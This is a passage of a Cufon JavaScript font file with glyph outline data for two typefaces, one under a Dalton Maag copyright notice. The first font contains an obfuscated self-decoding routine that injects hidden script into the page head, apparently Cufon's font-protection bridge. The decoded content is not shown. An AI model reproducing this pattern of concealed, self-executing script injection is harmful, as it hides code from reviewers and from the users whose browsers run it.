,-46r52,0r0,46","w":113},{"d":"226,-62v30,31,82,7,82,-40r0,-153r-36,0r0,-45r117,0r0,45r-29,0r0,153v8,92,-91,138,-159,84v-70,51,-159,8,-159,-84r0,-153r-29,0r0,-45r117,0r0,45r-36,0r0,153v-6,47,52,70,81,40r0,-193r51,0r0,193","w":399},{"d":"204,-159v46,-65,174,-31,162,60r0,55r32,0r0,44r-112,0r0,-44r31,0v1,-47,7,-100,-42,-100v-51,0,-49,50,-47,100r28,0r0,44r-101,0r0,-44r25,0v1,-48,5,-100,-44,-100v-49,0,-45,51,-44,100r32,0r0,44r-112,0r0,-44r30,0r0,-101r-30,0r0,-44r80,0r0,13v31,-30,92,-19,112,17","w":408},{"d":"130,0r-113,0r0,-44r31,0r0,-211r-31,0r0,-45r83,0r0,256r30,0r0,44","w":136},{"d":"181,-13v-60,44,-150,-2,-142,-81r0,-51r-29,0r0,-44r114,0r0,44r-34,0v-1,46,-6,105,40,101v10,0,18,-3,24,-8r0,-93r52,0r0,93v29,19,64,3,64,-42r0,-52r-35,0r0,-44r114,0r0,44r-28,0v7,84,-14,150,-90,150v-20,0,-37,-5,-50,-17","w":360},{"d":"127,-90r-103,0r0,-48r103,0r0,48","w":154},{"d":"281,0r-113,0r0,-44r30,0v-8,-23,-34,-59,-51,-75v-17,16,-43,52,-51,75r30,0r0,44r-114,0r0,-44v20,1,30,1,30,0v6,-34,29,-70,68,-107v-35,-34,-57,-69,-63,-104r-31,0r0,-45r114,0r0,45r-30,0v8,26,24,49,47,71v24,-23,40,-46,48,-71r-30,0r0,-45r113,0r0,45r-30,0v-6,33,-28,68,-64,103v38,37,60,73,67,108r30,0r0,44","w":295},{"d":"107,-210r-50,0r0,-45r50,0r0,45xm107,-31v1,66,-49,126,-120,109r0,-49v42,8,69,-17,69,-60r0,-114r-31,0r0,-43r82,0r0,157","w":119},{"d":"112,-304v56,0,99,44,99,102r0,103v2,59,-42,103,-99,103v-57,0,-99,-44,-99,-103r0,-103v-2,-58,43,-102,99,-102xm112,-45v68,0,50,-92,50,-157v0,-31,-20,-51,-50,-51v-68,-1,-50,90,-50,154v0,30,19,54,50,54","w":220},{"d":"173,-20r-157,-68r0,-53r157,-68r0,53r-105,42r105,41r0,53","w":183},{"d":"44,-331v38,37,69,109,69,181v0,72,-31,144,-69,181r-42,0v81,-102,81,-260,0,-362r42,0","w":142},{"d":"166,-88r-157,68r0,-53r105,-41r-105,-42r0,-53r157,68r0,53","w":174},{"d":"60,-300r-9,114r-34,0r-8,-114r51,0","w":93},{"d":"111,-45v41,0,55,-35,50,-81r-61,0r0,-48r110,0r0,174r-49,0r0,-13v-61,46,-149,-8,-149,-86r0,-102v-8,-78,87,-130,150,-86r0,-13r48,0r0,85r-50,0v-3,-26,-19,-38,-49,-38v-70,0,-46,92,-49,154v-2,32,17,54,49,54","w":223},{"d":"204,-170v56,53,27,175,-64,175v-16,0,-32,-6,-45,-18r0,50r31,0r0,43r-112,0r0,-43r31,0r0,-182r-31,0r0,-44r81,0r0,15v27,-27,82,-21,109,4xm140,-44v32,0,44,-18,44,-52v0,-32,-14,-49,-44,-49v-32,0,-45,19,-45,54v0,31,15,47,45,47","w":242},{"d":"209,-70r-32,0r0,26r31,0r0,44r-111,0r0,-44r31,0r0,-26r-118,0r0,-45r125,-185r42,0r0,185r32,0r0,45xm128,-204r-62,89r62,0r0,-89","w":225},{"d":"259,-188r0,43r-32,0r-69,145r-48,0r-65,-145r-33,0r0,-43r108,0r0,43r-18,0r33,83r36,-83r-19,0r0,-43r107,0","w":271},{"d":"63,-182v60,-42,148,11,148,84v0,58,-41,102,-99,102v-55,0,-98,-45,-98,-99r0,-110v-3,-76,84,-125,153,-85v18,10,32,25,41,44r-35,31v-16,-54,-112,-51,-110,11r0,22xm112,-45v30,0,51,-23,50,-53v0,-27,-21,-51,-50,-50v-30,0,-51,21,-50,53v0,27,20,50,50,50","w":223},{"d":"42,-198v-1,-56,33,-101,85,-102r76,0r0,72r-48,0r0,-27v-53,-7,-69,27,-64,81r76,0r0,48r-76,0r0,82r29,0r0,44r-107,0r0,-44r29,0r0,-154","w":208},{"d":"208,-280v64,54,30,191,-68,180r-44,0r0,56r30,0r0,44r-111,0r0,-44r31,0v4,-110,-29,-251,89,-259v28,-2,53,6,73,23xm191,-202v0,-31,-22,-49,-53,-49v-47,0,-43,51,-42,99v51,2,95,1,95,-50","w":244},{"d":"9,-42v52,-1,73,-16,73,-68r0,-145r-32,0r0,-45r113,0r0,45r-31,0v-4,84,17,197,-33,235v-20,15,-49,24,-90,24r0,-46","w":170},{"d":"155,-218v6,-43,-54,-43,-57,-11v0,7,1,14,4,17r84,96r0,-60r75,0r0,44r-27,0v-1,19,2,50,-4,60r25,28r35,0r0,44r-64,0r-22,-25v-61,65,-182,15,-182,-75v0,-36,14,-65,40,-85v-40,-50,2,-119,64,-119v46,0,82,39,80,86r-51,0xm96,-145v-40,24,-21,97,34,97v17,0,30,-5,40,-16","w":297},{"d":"76,0r-52,0r0,-320r52,0r0,320","w":104},{"d":"112,-304v54,0,97,45,97,100r0,110v4,76,-85,123,-153,84v-18,-10,-32,-25,-41,-44r35,-30v16,54,110,51,110,-10r0,-23v-59,43,-148,-11,-148,-84v0,-58,41,-103,100,-103xm112,-152v31,0,50,-21,49,-52v0,-28,-20,-50,-49,-50v-30,0,-50,23,-50,53v0,27,22,49,50,49","w":226},{"d":"140,-304v62,0,100,43,100,108r0,152r30,0r0,44r-112,0r0,-44r32,0r0,-68r-99,0r0,68r31,0r0,44r-112,0r0,-44r31,0r0,-153v-2,-64,38,-107,99,-107xm140,-253v-46,0,-53,42,-49,91r99,0v4,-49,-4,-91,-50,-91","w":280},{"d":"175,-91r-57,0r0,58r-48,0r0,-58r-57,0r0,-47r57,0r0,-57r48,0r0,57r57,0r0,47","w":190},{"d":"139,-193v4,-40,-67,-43,-67,-9v0,17,47,32,66,40v37,17,55,38,55,64v1,42,-29,70,-69,72r0,35r-32,0r0,-35v-8,-1,-18,-4,-23,-8r0,10r-46,0r0,-90r46,1v-8,48,70,53,74,14v-4,-15,-45,-31,-66,-39v-78,-29,-61,-129,15,-137r0,-32r32,0r0,35v3,1,8,3,15,6r0,-10r50,0r0,83r-50,0","w":208},{"d":"127,0r-113,0r0,-44r31,0r0,-211r-31,0r0,-45r113,0r0,45r-30,0r0,211r30,0r0,44","w":140},{"d":"146,-300r-9,114r-34,0r-9,-114r52,0xm74,-300r-9,114r-33,0r-9,-114r51,0","w":181},{"d":"265,0r-112,0r0,-44r15,0r-51,-75v-10,8,-18,16,-24,22r1,53r30,0r0,44r-112,0r0,-44r30,0r0,-211r-30,0r0,-45r112,0r0,45r-30,0r0,93v29,-25,73,-54,82,-93r-31,0r0,-45r113,0r0,45r-32,0v-5,35,-28,70,-68,104r72,107r35,0r0,44","w":276},{"d":"197,-158v65,36,36,158,-50,158r-134,0r0,-44r30,0r0,-164v-1,-52,39,-96,90,-96v79,0,121,100,64,146xm133,-253v-34,0,-44,34,-40,74v40,-1,84,9,81,-37v-1,-22,-18,-37,-41,-37xm147,-44v46,1,49,-84,2,-85r-56,0r0,85r54,0","w":250},{"d":"272,-255r-31,0r0,211r31,0r0,44r-114,0r0,-44r32,0r0,-82r-97,0r0,82r30,0r0,44r-113,0r0,-44r31,0r0,-211r-31,0r0,-45r113,0r0,45r-30,0r0,81r97,0r0,-81r-31,0r0,-45r113,0r0,45","w":281},{"d":"202,-300v19,134,-111,166,-98,300r-50,0v-15,-118,81,-164,98,-255r-91,0r0,17r-49,0r0,-62r190,0","w":210},{"d":"89,-278v0,45,-15,108,39,101r0,54v-56,-8,-39,56,-39,101v0,58,-29,87,-82,81r0,-51v45,6,31,-60,31,-100v0,-27,11,-47,34,-58v-43,-16,-33,-70,-34,-125v0,-23,-10,-34,-31,-32r0,-51v53,-4,82,27,82,80","w":135},{"d":"64,-136r-48,0r0,-46r48,0r0,46xm64,0r-48,0r0,-46r48,0r0,46","w":82},{"d":"145,-304v59,-1,96,43,96,103r0,157r31,0r0,44r-113,0r0,-44r30,0r1,-157v1,-32,-18,-51,-49,-51v-31,0,-50,19,-49,51r0,157r31,0r0,44r-113,0r0,-44r31,0r0,-212r-31,0r0,-44r82,0r0,12v10,-11,28,-16,53,-16","w":280},{"d":"163,-136r-147,0r0,-47r147,0r0,47xm163,-46r-147,0r0,-47r147,0r0,47","w":178},{"d":"66,-146v0,51,-9,111,53,101r0,45v-67,5,-104,-30,-104,-93r0,-159r51,0r0,63r51,0r0,43r-51,0","w":132},{"d":"233,-300r0,72r-50,0r0,-27r-36,0r0,211r30,0r0,44r-112,0r0,-44r31,0r0,-211r-37,0r0,27r-48,0r0,-72r222,0","w":240},{"d":"102,-193v61,0,100,48,90,115r-132,0v6,33,56,47,79,18r52,0v-11,36,-42,64,-86,64v-57,0,-95,-42,-95,-102v0,-55,38,-96,92,-95xm142,-118v-9,-33,-73,-37,-81,0r81,0","w":204},{"d":"206,0r-194,0r0,-44r31,0r0,-211r-31,0r0,-45r113,0r0,45r-31,0r0,211r63,0r0,-18r49,0r0,62","w":213},{"d":"205,-210r-6,38r-34,0r-10,68r34,0r-5,39r-35,0r-7,51r-40,0r8,-51r-40,0r-7,51r-39,0r7,-51r-34,0r5,-39r34,0r10,-68r-34,0r6,-38r34,0r8,-52r39,0r-7,52r39,0r7,-52r40,0r-7,52r34,0xm126,-172r-40,0r-10,68r39,0","w":212},{"d":"9,-177v78,6,11,-120,59,-162v15,-14,35,-21,62,-19r0,51v-45,-6,-31,59,-31,99v0,28,-11,47,-34,58v43,17,33,71,34,126v0,23,10,34,31,32r0,51v-53,6,-82,-23,-82,-81v0,-44,17,-109,-39,-101r0,-54","w":138},{"d":"162,-103v0,-41,-37,-57,-85,-51r0,-23r53,-78r-52,0r0,25r-50,0r0,-70r192,0r-69,101v34,15,60,50,60,97v0,88,-107,141,-169,79v-20,-19,-30,-45,-30,-77r50,0v0,34,16,52,50,52v30,0,50,-25,50,-55"},{"d":"170,-184v26,14,48,46,49,84v1,58,-47,105,-103,105v-56,0,-104,-46,-103,-105v1,-37,24,-70,49,-84v-49,-42,-6,-120,54,-120v61,0,105,78,54,120xm116,-200v18,0,34,-12,33,-31v0,-18,-14,-31,-33,-31v-19,0,-32,13,-32,31v0,15,14,31,32,31xm116,-44v29,0,54,-24,54,-54v0,-32,-22,-54,-54,-54v-31,0,-54,22,-54,54v0,30,25,53,54,54"},{"d":"8,-150v0,-72,31,-144,69,-181r42,0v-82,102,-81,260,0,362r-42,0v-38,-37,-69,-109,-69,-181","w":128},{"d":"132,51r-96,0r0,-402r96,0r0,43r-48,0r0,316r48,0r0,43","w":142},{"d":"45,-44v8,-111,-39,-284,100,-262r0,48v-48,-11,-52,21,-51,69r48,0r0,45r-48,0r0,100r30,0r0,44r-110,0r0,-44r31,0","w":155},{"d":"116,-304v59,0,104,44,102,102v-2,54,9,116,-12,154v15,8,30,12,43,12r0,36v-24,0,-47,-6,-67,-19v-63,54,-168,6,-168,-80r0,-103v-1,-59,45,-102,102,-102xm64,-202v0,74,-15,180,74,151v-10,-5,-21,-7,-32,-7r0,-37v20,0,39,6,57,19v9,-34,3,-85,4,-126v1,-31,-20,-51,-51,-51v-31,0,-52,20,-52,51","w":254},{"d":"148,-320r-90,320r-55,0r90,-320r55,0","w":150},{"d":"12,-198v-2,-60,29,-102,83,-102r91,0r0,72r-48,0r0,-27v-60,-8,-84,20,-78,81r99,0r0,48r-99,0v-5,57,16,92,78,82r0,-28r48,0r0,72r-91,0v-52,-1,-83,-44,-83,-102r0,-96","w":196},{"d":"105,-193v76,0,105,62,95,149r29,0r0,45r-79,0r0,-15v-55,45,-138,-1,-138,-84v0,-57,37,-96,93,-95xm105,-44v32,0,45,-19,45,-54v0,-31,-15,-47,-45,-47v-32,0,-44,19,-44,53v0,32,14,48,44,48","w":236},{"d":"244,-140v39,0,70,33,70,70v0,37,-31,70,-70,70v-40,0,-70,-33,-70,-70v0,-37,30,-70,70,-70xm264,-285r-156,285r-43,0r157,-285r42,0xm82,-278v39,0,70,33,70,70v1,38,-31,70,-70,70v-40,0,-71,-33,-70,-70v0,-37,31,-70,70,-70xm244,-38v16,0,30,-15,30,-32v0,-17,-14,-32,-30,-32v-17,0,-31,14,-31,32v0,18,14,32,31,32xm82,-176v16,0,30,-15,30,-32v0,-17,-15,-31,-30,-32v-15,0,-30,15,-30,32v0,17,14,32,30,32","w":326},{"d":"214,67r-205,0r0,-47r205,0r0,47","w":224},{"d":"243,-45r0,45r-110,0r0,-45r20,0r-26,-29v-8,4,-19,10,-33,18r0,56r-81,0r0,-45r31,0r0,-226r-31,0r0,-45r81,0r0,208v19,-10,46,-21,56,-37r-21,0r0,-43r110,0r0,43r-33,0v-7,15,-21,30,-40,45r46,55r31,0","w":256}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+22-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("HZ3%n|4B1;.@j~K&ZVAPHW#4Qpix!`oT;uE31nc(wzeL,OMG|N5S=t$_8)kI}yB%aqR6U*Jg>^g8HjG*(|&}AZAgua4%3|g8uaP}1;xN3TJ$EyB,#jIwWNL.1ZG,3yg!;|g>H,@;`T4%QaxTcG%3nK#_u&Iy#NSc(`.kE`@KEqM%EV&8AT(_#u(c(`Ak#`@E1MJJH`RNxq.B(O3ZoK5|z~G@H}xPujPWiMeqz`SQpuxo3okOwy#RH&_|oTk)x;KGua$,WN4knZGBHjA,H!ISp`.$c~%,WN.$n~%kW|IGn|(B1jINp;A83,6NnVGk1V#gwqB*1;E5E,6)1yB)u,e^QN(q(%k8H`J5py58H%k8(ZLG3|G81u451;6NcZgy(&k8Eag_zjRtuj6B1ZT|1;6ScaLSn|(knq4Buj6On%k8(;$SPjJ8(ZTy(jL$na4L(ZG)n,65nq4Bn|&_3!MS3|g}H~_SpZk*H}_SH;(nE%_SuTBgc&_SuuBSHjMe")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":232,"face":{"font-family":"Charifa","font-weight":400,"font-stretch":"normal","units-per-em":"400","panose-1":"0 0 4 0 0 0 0 0 0 0","ascent":"320","descent":"-80","x-height":"4","bbox":"-13 -358.345 426 84.0157","underline-thickness":"8","underline-position":"-49.2","unicode-range":"U+0020-U+007E"}}));/*! * The following copyright notice may not be removed under any circumstances. *  * Copyright: * Copyright 2008 Jonas Schudel Dalton Maag Ltd. All rights reserved. This font * may not be altered in any way without prior permission of Dalton Maag Ltd. DaMa * is a trademark of Dalton Maag Ltd. *  * Trademark: * Effra is a trademark of Jonas Schudel and Dalton Maag Ltd. *  * Description: * Copyright (c) 2007 by Jonas Schudel and Dalton Maag Ltd. All rights reserved. *  * Manufacturer: * Jonas Schudel and Dalton Maag Ltd. *  * Designer: * Jonas Schudel *  * Vendor URL: *  * License information: */Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"131,-18v-33,41,-113,23,-113,-46r0,-105r52,0v6,46,-20,128,28,128v51,0,28,-80,33,-128r52,0r0,169r-50,0","w":201},{"d":"71,-121v-7,81,103,96,132,43r37,34v-22,28,-54,50,-102,50v-78,0,-118,-48,-124,-125v-9,-122,160,-168,224,-80r-37,36v-13,-19,-31,-34,-61,-34v-45,0,-65,31,-69,76","w":245},{"d":"62,-69v-1,42,74,40,95,18r22,33v-18,13,-42,25,-75,24v-57,-2,-92,-32,-92,-91v0,-56,33,-90,87,-90v59,0,85,42,83,106r-120,0xm133,-102v2,-38,-59,-41,-69,-11v-2,4,-2,7,-2,11r71,0","w":192},{"d":"136,-128v69,18,55,134,-20,132r0,35r-34,0r0,-34v-33,-3,-61,-18,-78,-37r32,-36v13,13,36,29,64,28v27,5,45,-28,22,-40v-37,-20,-110,-24,-107,-84v2,-39,29,-62,67,-66r0,-32r34,0r0,32v27,2,47,16,61,28r-31,35v-15,-18,-74,-34,-81,2v4,29,46,25,71,37"},{"d":"3,-240r60,0r58,175r58,-175r57,0r-88,240r-57,0","w":239},{"d":"22,-169r59,0r0,57r-59,0r0,-57xm22,-57r59,0r0,57r-59,0r0,-57","w":102},{"d":"92,-175v89,0,75,91,75,175r-49,0r-1,-16v-26,35,-111,27,-108,-31v3,-53,51,-66,108,-60v2,-41,-61,-29,-80,-14r-22,-31v20,-13,43,-23,77,-23xm84,-32v24,-1,36,-15,33,-43v-26,-2,-58,-2,-58,22v0,14,8,21,25,21","w":185},{"d":"169,-32v23,0,35,-16,31,-43v-26,-3,-56,-1,-56,22v0,14,9,21,25,21xm55,-99v0,36,12,64,29,82r-29,23v-24,-22,-41,-58,-41,-104v0,-97,64,-149,161,-149v97,0,155,47,156,143v1,63,-22,106,-79,109v-23,1,-34,-6,-43,-20v-29,34,-117,27,-114,-32v2,-51,49,-65,105,-59v4,-42,-59,-30,-78,-15r-22,-31v40,-37,157,-34,149,42v4,25,-11,73,13,77v25,-6,30,-39,30,-71v0,-72,-45,-107,-117,-107v-72,0,-119,37,-120,112","w":345},{"d":"10,-81r98,-146r52,0r0,145r23,0r0,41r-23,0r0,41r-48,0r0,-41r-102,0r0,-40xm112,-82r0,-84r-55,84r55,0"},{"d":"19,-240r52,0r0,124r51,-53r59,0r-60,62r68,107r-60,0r-43,-71r-15,15r0,56r-52,0r0,-240","w":191},{"d":"98,-197v-23,-1,-42,28,-21,45v15,21,50,6,50,-19v-1,-16,-13,-26,-29,-26xm98,-35v41,4,48,-52,13,-63v-22,-12,-50,7,-50,32v0,22,16,30,37,31xm9,-64v0,-32,17,-50,40,-61v-13,-9,-29,-25,-28,-47v2,-42,32,-61,77,-61v44,1,75,18,77,60v1,22,-15,39,-28,47v22,11,40,29,40,61v0,47,-38,71,-89,71v-51,0,-89,-22,-89,-70"},{"d":"19,-240r52,0r0,240r-52,0r0,-240","w":90},{"d":"92,-240r60,0r88,240r-59,0r-19,-55r-84,0r-19,55r-56,0xm149,-97r-29,-91r-30,91r59,0","w":243},{"d":"23,-240r55,0r0,92r104,0r0,-92r54,0r0,240r-54,0r0,-99r-104,0r0,99r-55,0r0,-240","w":259},{"d":"0,23r180,0r0,20r-180,0r0,-20","w":180},{"d":"64,-85v-6,45,55,57,76,29r31,34v-15,14,-37,29,-68,28v-57,-2,-88,-34,-91,-91v-5,-84,107,-117,159,-62r-31,34v-19,-29,-82,-18,-76,28","w":175},{"d":"167,-73v7,89,-122,101,-163,44r35,-34v15,29,74,32,74,-14r0,-163r54,0r0,167","w":188},{"d":"24,-300r47,0r0,359r-47,0r0,-359","w":94},{"d":"85,-192r-77,0r0,-48r209,0r0,48r-77,0r0,192r-55,0r0,-192","w":225},{"d":"197,-165v0,34,-17,56,-39,69r53,96r-60,0r-44,-88r-31,0r0,88r-53,0r0,-240v84,-2,174,-8,174,75xm142,-163v0,-34,-32,-34,-66,-32r0,63v34,2,66,1,66,-31","w":218},{"d":"12,-82v-4,-89,98,-105,172,-78r0,232r-52,0r0,-82v-8,9,-23,16,-42,15v-52,-1,-76,-34,-78,-87xm99,-39v42,3,32,-47,33,-86v-33,-12,-71,5,-68,43v2,25,11,42,35,43","w":203},{"d":"79,-240r45,0r63,132r-52,0r-33,-76r-34,76r-52,0","w":203},{"d":"19,-240r55,0r0,46r-55,0r0,-46xm21,-169r51,0r0,169r-51,0r0,-169","w":92},{"d":"23,-125r114,0r0,49r-114,0r0,-49","w":160},{"d":"151,-137v77,32,43,143,-47,143v-46,0,-75,-17,-98,-40r35,-38v15,26,86,49,97,4v-5,-41,-76,-30,-100,-60v-47,-59,16,-145,102,-115v21,7,38,14,50,29r-31,34v-16,-19,-74,-35,-83,1v4,31,49,31,75,42","w":212},{"d":"21,-240r55,0r0,46r-55,0r0,-46xm75,-9v10,70,-62,102,-114,66r20,-35v18,12,42,5,42,-23r0,-168r52,0r0,160","w":95},{"w":65},{"d":"15,-107v-4,-94,74,-154,160,-112r-19,40v-36,-23,-89,0,-88,43v45,-30,122,-4,116,61v-4,49,-30,81,-81,81v-64,0,-85,-47,-88,-113xm135,-75v0,-38,-50,-39,-68,-20v1,31,6,56,36,56v20,1,32,-15,32,-36"},{"d":"7,-247r51,0r96,253r-52,0","w":161},{"d":"150,-82v40,59,-36,108,-106,82v-13,-5,-25,-11,-33,-19r25,-33v10,9,31,15,48,17v21,3,38,-16,19,-25v-34,-16,-84,-16,-84,-62v0,-62,100,-63,139,-34r-22,35v-11,-7,-24,-14,-43,-14v-22,0,-30,17,-11,24v19,6,58,15,68,29","w":173},{"d":"24,-240r57,0r-2,162r-53,0xm24,-55r57,0r0,55r-57,0r0,-55","w":105},{"d":"120,-78v-28,-6,-63,-29,-85,0r-22,-36v14,-25,61,-35,87,-13v20,7,35,-3,46,-14r22,36v-10,13,-26,25,-48,27","w":181},{"d":"26,-254r90,0r0,42r-42,0r0,203r42,0r0,42r-90,0r0,-287","w":125},{"d":"65,-85r-62,-84r62,0r30,45r31,-45r57,0r-60,81r65,88r-62,0r-33,-49r-34,49r-57,0","w":189},{"d":"82,-123r-79,-117r66,0r45,70r43,-70r60,0r-74,113r87,127r-67,0r-52,-81r-51,81r-59,0","w":230},{"d":"62,-85v0,28,14,46,40,46v27,0,41,-20,41,-46v0,-26,-14,-45,-41,-45v-25,0,-40,18,-40,45xm102,6v-55,0,-90,-36,-90,-91v0,-55,35,-90,90,-90v56,0,91,36,91,90v0,54,-35,91,-91,91","w":204},{"d":"87,-240r48,0r0,90r-48,0r0,-90xm17,-240r48,0r0,90r-48,0r0,-90","w":151},{"d":"17,-240r48,0r0,90r-48,0r0,-90","w":81},{"d":"18,-168r39,-18r-39,-18r20,-35r34,23r-4,-41r41,0r-3,42r34,-24r20,35r-39,17r39,18r-20,35r-35,-24r4,42r-41,0r4,-41r-34,23","w":177},{"d":"4,-240r58,0r35,174r42,-168r50,0r42,168r35,-174r56,0r-61,240r-57,0r-41,-157r-42,157r-57,0","w":325},{"d":"55,-111v53,18,15,116,52,144r-48,0v-29,-22,-13,-86,-29,-122v-4,-5,-11,-7,-20,-7r0,-29v53,-4,9,-98,49,-129r48,0v-37,29,3,126,-52,143","w":111},{"d":"23,-240r165,0r0,47r-110,0r0,47r85,0r0,46r-85,0r0,52r117,0r0,48r-172,0r0,-240","w":208},{"d":"149,-13v-44,37,-126,19,-117,-51r0,-64r-27,0r0,-41r27,0r0,-51r52,0r0,51r43,0r0,41r-43,0v5,33,-14,90,20,92v10,0,18,-5,24,-9","w":150},{"d":"104,-128v-50,0,-29,79,-33,128r-52,0r0,-169r50,0r2,19v17,-28,83,-31,98,1v35,-42,123,-27,123,45r0,104r-52,0r0,-96v0,-19,-7,-33,-26,-32v-50,2,-29,79,-33,128r-50,0v-6,-45,20,-128,-27,-128","w":310},{"d":"188,-115v0,67,-23,121,-90,121v-65,0,-89,-52,-89,-121v0,-68,23,-118,89,-118v68,0,90,51,90,118xm61,-115v0,35,5,70,37,74v32,-3,37,-39,37,-74v0,-35,-6,-67,-37,-71v-31,3,-37,36,-37,71"},{"d":"105,-128v-53,0,-29,79,-34,128r-52,0r0,-169r50,0r2,19v32,-43,113,-23,113,46r0,104r-52,0v-6,-46,19,-128,-27,-128","w":202},{"d":"172,-180v0,58,-59,48,-60,102r-49,0v-3,-44,23,-61,48,-80v19,-14,6,-43,-21,-41v-22,2,-35,12,-47,22r-32,-34v33,-48,161,-53,161,31xm59,-55r57,0r0,55r-57,0r0,-55","w":189},{"d":"45,0r-21,0r0,-58r59,0r0,58r-30,51r-31,0xm25,-169r59,0r0,57r-59,0r0,-57","w":104},{"w":65},{"d":"12,-82v-2,-67,57,-103,121,-85r0,-73r51,0r0,240r-48,0r-2,-17v-10,12,-26,22,-49,22v-48,-3,-73,-36,-73,-87xm100,-39v40,0,33,-45,33,-83v-31,-18,-69,2,-69,41v0,23,12,42,36,42","w":203},{"d":"183,-5v7,83,-99,99,-157,63r21,-36v30,21,95,19,84,-37v-49,34,-119,1,-119,-66v0,-88,98,-107,171,-79r0,155xm98,-43v42,2,32,-45,33,-83v-32,-12,-67,5,-67,43v0,23,12,39,34,40","w":201},{"d":"264,-120v0,77,-49,126,-125,126v-77,0,-125,-50,-125,-126v0,-76,48,-127,125,-127v77,0,125,50,125,127xm71,-121v0,45,24,76,68,76v45,0,68,-32,68,-76v0,-44,-24,-75,-68,-75v-44,0,-68,30,-68,75","w":277},{"d":"264,-120v2,39,-16,71,-38,91r26,32r-30,24r-27,-33v-89,36,-185,-19,-181,-114v3,-76,48,-127,125,-127v77,0,122,50,125,127xm71,-121v-1,52,38,87,90,72r-26,-32r29,-25r28,35v31,-45,11,-129,-53,-125v-44,2,-67,30,-68,75","w":277},{"d":"2,-169r57,0r40,111r39,-111r56,0r-72,169r-49,0"},{"d":"5,33v35,-29,0,-125,51,-144v-51,-13,-15,-107,-51,-143r48,0v29,22,9,88,29,122v3,6,11,7,20,7r0,29v-54,3,-10,98,-49,129r-48,0","w":111},{"d":"131,-123v-30,-10,-60,6,-60,39r0,84r-52,0r0,-169r50,0r2,21v10,-17,40,-30,68,-21","w":141},{"d":"106,-254v-40,70,-41,217,0,287r-52,0v-43,-70,-43,-218,0,-287r52,0","w":115},{"d":"145,-182v-6,-26,-50,-30,-52,-1v12,42,47,62,69,94r32,-37r35,30r-37,42r45,54r-63,0r-17,-20v-42,44,-150,31,-147,-44v2,-36,18,-59,47,-75v-35,-43,-5,-112,58,-108v35,2,55,19,67,42xm84,-106v-30,12,-32,68,10,66v17,0,23,-7,34,-15","w":239},{"d":"28,27v24,19,48,-3,51,-29r-77,-167r59,0r42,107r38,-107r55,0r-80,196v-9,41,-68,66,-108,35","w":198},{"d":"172,-69v2,81,-121,95,-168,47r28,-37v20,25,86,31,87,-14v1,-27,-33,-39,-57,-28r-14,-21r58,-59r-84,0r0,-45r142,0r0,37r-47,53v34,6,54,30,55,67"},{"d":"195,-163v0,64,-49,83,-119,78r0,85r-53,0r0,-240r88,0v53,0,84,27,84,77xm141,-162v0,-32,-30,-37,-65,-34r0,67v34,2,65,0,65,-33","w":208},{"d":"193,-86v2,68,-58,105,-122,85r0,73r-52,0r0,-241r50,0r2,19v10,-12,28,-22,48,-22v50,0,73,36,74,86xm106,-128v-39,-1,-36,43,-35,83v30,19,70,-1,70,-40v0,-26,-11,-42,-35,-43","w":205},{"d":"94,-233v72,0,98,75,53,117v-20,19,-44,36,-63,54v-5,5,-7,10,-7,16r95,0r0,46r-154,0v-10,-85,52,-105,93,-147v21,-22,-6,-50,-37,-39v-11,5,-18,14,-25,23r-38,-26v16,-25,41,-44,83,-44"},{"d":"62,-254v42,69,44,217,0,287r-52,0v41,-70,41,-217,0,-287r52,0","w":115},{"d":"26,-135r51,0r0,-51r42,0r0,51r51,0r0,41r-51,0r0,50r-42,0r0,-50r-51,0r0,-41"},{"d":"47,-246r51,0r18,52r-39,0","w":169},{"d":"105,-128v-43,-3,-33,47,-34,87v33,14,70,-7,67,-45v-2,-23,-10,-41,-33,-42xm190,-87v5,90,-98,108,-171,81r0,-234r52,0r0,84v9,-9,27,-16,44,-16v51,1,72,35,75,85","w":202},{"d":"23,-240r55,0r0,192r115,0r0,48r-170,0r0,-240","w":201},{"d":"23,-240r55,0r0,96r80,-96r63,0r-82,93r93,147r-66,0r-64,-105r-24,28r0,77r-55,0r0,-240","w":235},{"d":"171,-75v0,87,-117,102,-165,52r27,-36v18,25,86,32,86,-16v0,-35,-45,-40,-72,-27r-24,-18r20,-106r123,0r0,45r-87,0r-7,36v53,-12,99,17,99,70"},{"d":"23,-240r52,0r104,156r0,-156r54,0r0,240r-49,0r-107,-159r0,159r-54,0r0,-240","w":256},{"d":"14,-44r131,-148r-125,0r0,-48r192,0r0,45r-129,147r132,0r0,48r-201,0r0,-44","w":228},{"d":"23,-240r162,0r0,48r-107,0r0,54r81,0r0,47r-81,0r0,91r-55,0r0,-240","w":194},{"d":"207,-69v2,85,-102,67,-184,69r0,-240v77,1,172,-13,172,63v0,27,-17,42,-37,50v27,7,49,24,49,58xm141,-171v0,-31,-34,-27,-65,-27r0,54v31,0,65,4,65,-27xm152,-73v0,-36,-41,-31,-76,-31r0,62v36,0,76,6,76,-31","w":221},{"d":"122,6v-62,0,-100,-35,-100,-97r0,-149r54,0r0,142v0,32,13,52,46,52v32,0,46,-18,46,-52r0,-142r55,0r0,149v-1,62,-39,97,-101,97","w":244},{"d":"3,-169r53,0r29,109r33,-109r41,0r34,109r29,-109r52,0r-58,169r-46,0r-32,-94r-31,94r-47,0","w":276},{"d":"24,-130r128,-68r19,37r-90,46r91,47r-20,37r-128,-68r0,-31"},{"d":"10,-9r42,0r0,-203r-42,0r0,-42r90,0r0,287r-90,0r0,-42","w":125},{"d":"23,-240r55,0r0,240r-55,0r0,-240","w":101},{"d":"22,-57r59,0r0,57r-59,0r0,-57","w":102},{"d":"133,-196v-20,-16,-57,-8,-49,27r40,0r0,41r-40,0r0,128r-52,0r0,-128r-27,0r0,-41r27,0v-9,-72,74,-97,123,-60","w":128},{"d":"87,-100r-84,-140r61,0r52,91r51,-91r59,0r-84,139r0,101r-55,0r0,-100","w":228},{"d":"31,-240r51,0r63,113r61,-113r52,0r11,240r-54,0r-7,-157r-50,94r-28,0r-53,-93r-6,156r-52,0","w":288},{"d":"53,-52